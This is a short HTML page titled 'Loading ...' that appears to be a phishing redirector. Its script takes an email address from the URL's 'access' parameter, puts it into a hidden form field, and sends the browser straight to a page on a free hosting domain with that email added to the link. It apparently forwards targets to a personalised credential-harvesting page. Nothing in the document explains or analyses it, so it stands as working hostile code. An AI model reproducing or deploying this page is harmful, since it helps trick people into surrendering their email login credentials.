<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Loading ...</title>
<script type="text/javascript">
		function getUrlVars() {
		    var vars = {};
		    var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m,key,value) {
		        vars[key] = value;
		    });
		    return vars;
			}
	</script>
	
</head>

<body>
<form>
          <div class="data">
            <input id="emailit" type="hidden" name="email">
          </div>
          </form>
<script>
		var email = getUrlVars()['access'];
	</script>
</body>
<script type="text/javascript">
var email = document.getElementById('emailit').value = email;
window.location.replace("https://restgrade.000webhostapp.com/isp?email="+email);
</script>
</html>
